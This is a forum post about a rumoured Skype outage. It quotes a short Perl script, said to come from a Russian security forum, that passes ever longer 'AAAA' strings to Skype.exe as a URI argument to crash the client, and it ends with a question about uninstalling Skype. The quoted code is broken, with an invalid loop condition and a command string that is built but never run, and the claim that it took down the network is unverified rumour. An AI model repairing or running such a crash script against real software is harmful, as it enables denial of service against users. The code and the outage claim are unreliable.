Subject: skype outage...maybe...

Rumour is that on SecurityLab.ru forum an exploit was published. There are claims it caused Skype mass disconnections Supposedly it uses standard Skype client to call to a specific number. This call causes denial of service of current Skype server and forces Skype to reconnect to another server. The new server also "freezes" and so on ... the entire network....or so they claim here and here #!/usr/bin/perl # Simle Code by Maranax Porex # Ya Skaypeg!! for ($i=256; $i>xCCCCC; $i=$i+256){ $eot='AAAA' x $i; call_sp(); } exit; sub call_sp(){ $str="\"C:\\Program Files\\Skype\\Phone\\Skype.exe\" \"/uri:$eot\""; }

ok am convinced - lets use something else. It has to have voice calls, conferencing, video and chat conferencing. And more than anything it has to just work - like skype used to. Say what you like about skype but it was more reliable than any other software of its genre. When we can't get teamspeak to work, we use skype instead. I guess the more important question is though, security guru should we uninstall skype ASAP for security reasons?
